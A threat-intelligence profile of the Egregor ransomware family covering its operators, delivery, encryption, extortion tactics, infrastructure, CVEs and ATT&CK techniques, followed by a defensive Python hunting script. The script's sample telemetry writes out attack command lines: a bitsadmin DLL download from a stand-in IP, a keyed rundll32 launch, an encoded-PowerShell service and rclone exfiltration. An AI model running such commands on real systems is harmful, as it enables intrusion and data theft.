Egregor
Egregor is a ransomware family active since mid-September 2020 and described as an offshoot of the Sekhmet malware family. It operated as ransomware-as-a-service (RaaS) and has been linked by multiple security firms to former Maze affiliates; some reporting also linked it to ProLock and LockBit. Egregor conducts double-extortion attacks: operators steal sensitive data, encrypt victim systems, and threaten to publish the exfiltrated data on the group's victim blog if the ransom is not paid. Reported victims include GEFCO, Barnes & Noble and Crytek, along with claims involving Ubisoft. As of 2020-11-24, its leak site reportedly listed 152 victim companies across multiple industries worldwide, with information technology, construction, retail, consumer goods, and automotive especially well represented.
Initial access and delivery varied by affiliate, but Egregor operators commonly deployed the ransomware after a prior compromise through phishing or compromised RDP access, with Cobalt Strike described as the primary distribution method for the payload once inside the network. QBot/QakBot has also been observed distributing Egregor, and related activity used living-off-the-land tools such as bitsadmin to download or update DLL components. One affiliate cluster, Lockean, used Egregor among several RaaS families after gaining access primarily through Qbot/QakBot and then using tools including Cobalt Strike, AdFind, BloodHound, BITSadmin, and Rclone. Microsoft also noted that DEV-0216 operated as an affiliate for Egregor, Maze, LockBit, REvil, and Conti.
Technically, Egregor payloads are heavily obfuscated DLLs containing Salsa20-encrypted configuration data. Each payload requires a sample-specific launch key passed with the -p parameter; without the correct key the DLL will not run, which also means a sample submitted to a sandbox without its key will not detonate. File encryption uses ChaCha for the file contents with RSA protecting the symmetric keys, and each payload embeds an RSA-2048 public key, so recovery depends on the operators' private key. Ransom notes instruct victims to visit a Tor-based payment portal and contain an encrypted blob with victim-specific system data and an encoded RSA public key. The victim-specific blob can include local drive information, drive size and free space, hostname, discovered antivirus or security products, and user or domain context.
Observed behavior includes HTTPS command-and-control communications, user discovery, disabling Windows Defender, anti-analysis and anti-sandbox techniques, process injection into iexplore.exe, use of encoded PowerShell commands via a service created by Cobalt Strike for lateral movement, and checking for the LogMeIn event log in an attempt to encrypt files on remote machines. Egregor also used Rclone for data exfiltration, dropping its own copy together with attacker-supplied configuration data. The malware reportedly avoids encrypting systems whose primary language is Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Kyrgyz, Romanian, Russian, Tajik, Tatar, Turkmen, Ukrainian, or Uzbek.
Egregor also used intimidation tactics associated with ransomware operations, including "print bombing": repeatedly printing ransom notes on printers connected to the victim network. Known infrastructure includes the victim blog egregoranrmzapcv[.]onion, the clearnet archive site egregornews[.]com, and the payment portal egregor4u5ipdzhv[.]onion.
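The behaviors described above (bitsadmin fetching DLL components, a DLL launched with a -p key, a Cobalt Strike-created service running encoded PowerShell, Rclone exfiltration with a dropped config, and print bombing) are concrete enough to hunt for. The following is an added example written for this page, not code from the page, from any vendor, or from the operators: a small Python triage script that runs those checks over constructed JSON-lines telemetry. The event field names, the rundll32/DllRegisterServer invocation, the ransom note file name, the IP address and the print thresholds are assumptions for illustration.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry for this example (not captured Egregor logs).
# Simplified JSON-lines shape; the field names, the rundll32/DllRegisterServer
# invocation and the ransom note file name are assumptions for illustration.
# Backslashes are doubled because the records are JSON inside a raw string.
SAMPLE_EVENTS = r"""
{"ts":"2020-11-20T10:01:00","type":"process","image":"C:\\Windows\\System32\\bitsadmin.exe","cmdline":"bitsadmin /transfer upd /download /priority high http://203.0.113.10/m.dll C:\\ProgramData\\m.dll"}
{"ts":"2020-11-20T10:02:10","type":"process","image":"C:\\Windows\\System32\\rundll32.exe","cmdline":"rundll32.exe C:\\ProgramData\\m.dll,DllRegisterServer -pA1b2C3d4"}
{"ts":"2020-11-20T10:03:00","type":"service","name":"f2a9e1","image_path":"%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"ts":"2020-11-20T10:04:00","type":"process","image":"C:\\ProgramData\\rclone.exe","cmdline":"rclone.exe copy C:\\Shares\\Finance remote:backup --config C:\\ProgramData\\rclone.conf -q"}
{"ts":"2020-11-20T10:05:00","type":"process","image":"C:\\Windows\\explorer.exe","cmdline":"explorer.exe"}
{"ts":"2020-11-20T10:06:00","type":"print","printer":"HQ-FLOOR2","document":"RECOVER-FILES.txt"}
{"ts":"2020-11-20T10:06:05","type":"print","printer":"HQ-FLOOR2","document":"RECOVER-FILES.txt"}
{"ts":"2020-11-20T10:06:11","type":"print","printer":"HQ-FLOOR3","document":"RECOVER-FILES.txt"}
{"ts":"2020-11-20T10:06:18","type":"print","printer":"HQ-FLOOR3","document":"RECOVER-FILES.txt"}
{"ts":"2020-11-20T10:06:24","type":"print","printer":"HQ-LOBBY","document":"RECOVER-FILES.txt"}
{"ts":"2020-11-20T10:06:30","type":"print","printer":"HQ-LOBBY","document":"RECOVER-FILES.txt"}
{"ts":"2020-11-20T11:30:00","type":"print","printer":"HQ-FLOOR2","document":"Q3-report.pdf"}
"""

# A bare "-p<key>" argument after the DLL export, as the launch key is described.
LAUNCH_KEY = re.compile(r"\s-p\S+")
PRINT_THRESHOLD, PRINT_WINDOW = 5, timedelta(minutes=2)  # assumed tuning values


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Return a finding for one process-creation event, or None."""
    exe, cmd = _basename(ev["image"]), ev["cmdline"]
    low = cmd.lower()
    if exe in ("rundll32.exe", "regsvr32.exe") and LAUNCH_KEY.search(cmd):
        return "DLL loaded with a -p launch key (Egregor payload launch pattern)"
    if exe == "bitsadmin.exe" and "/transfer" in low and ".dll" in low:
        return "bitsadmin used to download a DLL component"
    if exe.startswith("rclone") and "--config" in low:
        return "rclone run with a dropped config file (staging/exfiltration)"
    return None


def check_service(ev):
    """Flag a service whose binary path runs encoded PowerShell, the shape
    Cobalt Strike's service-based lateral movement leaves behind."""
    ip = ev["image_path"].lower()
    if "powershell" in ip and "-enc" in ip:  # matches -enc and -encodedcommand
        return f"service '{ev['name']}' runs encoded PowerShell"
    return None


def check_print_bomb(print_events):
    """Flag any document printed PRINT_THRESHOLD+ times within PRINT_WINDOW."""
    by_doc = defaultdict(list)
    for ev in print_events:
        by_doc[ev["document"]].append(datetime.fromisoformat(ev["ts"]))
    findings = []
    for doc, times in by_doc.items():
        times.sort()
        for i in range(len(times) - PRINT_THRESHOLD + 1):
            if times[i + PRINT_THRESHOLD - 1] - times[i] <= PRINT_WINDOW:
                findings.append(f"print bombing: '{doc}' printed {len(times)} times")
                break
    return findings


def hunt(jsonl):
    """Run every check over JSON-lines telemetry; returns (timestamp, finding)."""
    findings, prints = [], []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        if ev["type"] == "process":
            f = check_process(ev)
        elif ev["type"] == "service":
            f = check_service(ev)
        else:
            prints.append(ev)
            f = None
        if f:
            findings.append((ev["ts"], f))
    findings.extend(("window", f) for f in check_print_bomb(prints))
    return findings


if __name__ == "__main__":
    for ts, finding in hunt(SAMPLE_EVENTS):
        print(ts, finding)
```

On the constructed sample the script reports five findings and ignores the benign explorer.exe launch and the single Q3-report.pdf print job. The -p check on its own is a weak signal, since legitimate rundll32 invocations carry arbitrary arguments; it is the combination with a bitsadmin-fetched DLL, an encoded-PowerShell service and a burst of identical print jobs that makes the sequence worth paging on. The print-bomb threshold and window are placeholders to tune against the organization's normal print volume.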
Vulnerabilities exploited
7 CVEs correlated with this family across public research and vendor advisories. The evidence for most of them is weak or indirect; the supporting statement is quoted with each entry.
CVE-2018-8174 (VBScript Engine), CVE-2018-4878 (Adobe Flash Player) and CVE-2018-15982 (Adobe Flash Player): "Some sources also report the possible exploitation of CVE-2018-8174 (VBScript Engine), CVE-2018-4878 (Adobe Flash Player) & CVE-2018-15982 (Adobe Flash Player)." Reported as possible exploitation only.
CVE-2020-0688 (Microsoft Exchange remote code execution): "There have been limited and uncorroborated reports of Egregor utilizing CVE-2020-0688 (a remote code execution flaw in Microsoft Exchange)."
Windows BITS privilege elevation (the quoted source does not give the CVE number): "The Windows Background Intelligent Transfer Service (BITS) is vulnerable to a privilege elevation vulnerability... Actors exploiting this vulnerability commonly used the proof of concept code released by the security researcher... The exploit was used in Maze and Egregor ransomware campaigns." This is a local privilege escalation used after access has been obtained, not an initial-access vector.
CVE-2020-14882 and CVE-2020-14750 (Oracle WebLogic): "Researchers noticed a recent trend in which Prophet Spider uses CVE-2020-14882 and CVE-2020-14750 to get a foothold into target environments. Both CVEs relate to path traversal vulnerabilities that enable an attacker to access the WebLogic administrative console, which then allows for unauthenticated remote code execution." The exploitation is attributed to the access broker Prophet Spider, which passed access to Egregor operators, rather than to the Egregor payload or its core operators.
Groups observed using it
9 distinct threat actors attributed by public researchers. Supporting statements:
DEV-0216: "DEV-0216 ... has operated as an affiliate for Egregor, Maze, Lockbit, REvil, and Conti in numerous high-impact incidents."
Lockean: "Between June 2020 and March 2021, Lockean attacked at least seven more companies with various ransomware families: Maze, Egregor, ProLock, REvil."
TWISTED SPIDER: "...TWISTED SPIDER achieved at least 26 infections at healthcare sector victims with their Maze and Egregor ransomware families..."
Groups moving from Maze to Egregor after IcedID access: "At the close of 2020, we noticed a shift in a subset of these groups that have started to deploy EGREGOR ransomware in favor of MAZE ransomware following access acquired from ICEDID infections."
Prophet Spider (access broker): "Prophet Spider functioned as an access broker and likely granted access to Egregor and MountLocker ransomware operators in exchange for payment."
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic. Several of the evidence snippets below are taken from the ATT&CK technique descriptions and cite other actors (Sandworm Team, APT1, Maze, Bazar and others) to illustrate the technique rather than Egregor activity itself; read those as the technique definition, not as Egregor-specific reporting.
Initial Access (2 techniques)
"After the hacker gained access to a Windows domain administrator account..."
"Prophet Spider has also been seen using older Oracle CVEs such as CVE-2016-0545, as well as gaining initial access via SQL injection." Also: "attackers exploit Oracle WebLogic server flaws to access target environments" ... "uses CVE-2020-14882 and CVE-2020-14750 to get a foothold" ... "path traversal vulnerabilities that enable an attacker to access the WebLogic administrative console, which then allows for unauthenticated remote code execution."
Execution (4 techniques)
PowerShell: reporting repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
Batch scripts: '.bat', '.cmd', and 'batch scripts' are used to automate execution, persistence, cleanup, deployment, disabling security tools, and ransomware operations. Examples: 'APT1 has used ... batch scripting to automate execution', 'Blue Mockingbird has used batch script files to automate execution and deployment of payloads', and 'Cinnamon Tempest has executed ransomware using batch scripts deployed via GPO.'
Windows command shell: cmd.exe, cmd /c, the Windows command shell, and xp_cmdshell are used to execute commands, run payloads, launch binaries, and perform reconnaissance, persistence, cleanup, and ransomware actions. Examples include: 'Sandworm Team used the xp_cmdshell command in MS-SQL', 'APT41 used cmd.exe /c to execute commands on remote machines', and many malware families 'can use cmd.exe to execute commands on a compromised host.'
Citrix ADC: "Citrix ADC maintains a vulnerable Perl script (newbm.pl) that, when accessed via HTTP POST request ... allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software ... and gain unauthorized access to the OS."
Persistence (2 techniques)
Privilege Escalation (3 techniques)
Stealth (8 techniques)
Packing: "Sandworm Team used UPX to pack a copy of Mimikatz"; "APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium"; "Lazarus Group packed malicious .db files with Themida to evade detection."
"After the hacker gained access to a Windows domain administrator account..."
Discovery (9 techniques)
Account discovery: reporting repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
Security Software Discovery (MITRE ATT&CK T1518.001, under Software Discovery); this matches the antivirus and security-product inventory Egregor places in the ransom note blob.
System language check: examples include "Bazar can also check if the Russian language is installed on the infected machine and terminate if it is found," "DropBook has checked for the presence of Arabic language," and "Maze has checked the language of the infected system using the GetUserDefaultUILanguage function."
Lateral Movement (1 technique)
"During the 2022 Ukraine Electric Power Attack, Sandworm Team utilized a PowerShell utility called TANKTRAP to spread and launch a wiper using Windows Group Policy," and "Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts."
Command and Control (1 technique)
Impact (3 techniques)
Data Encrypted for Impact: adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key.
Other (2 techniques)
Impairing defenses: reporting repeatedly describes threat actors and malware disabling, stopping, uninstalling, or modifying antivirus, EDR, Windows Defender, AMSI, logging, and other security controls. Examples include 'Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools', 'BlackByte disabled security tools such as Windows Defender', 'Scattered Spider has uninstalled and disabled security tools', and many malware families terminating AV/EDR processes or services.
IOCs tracked for this family
45 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, in two groups:
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
65 sources tracked across advisories, community write-ups, and news. Recent mentions:
Ransomware payload dropped by Lockean affiliates on systems infected via Qbot/QakBot with TA551 collaboration.
Ransomware referenced as using intimidation and internal defacement techniques such as ransom notes and print bombing during encryption operations.
Ransomware family referenced as part of FIN7's known collaboration set in an article about Veeam CVEs; this is a contextual association only, and no direct technical linkage between Egregor and those CVEs is described.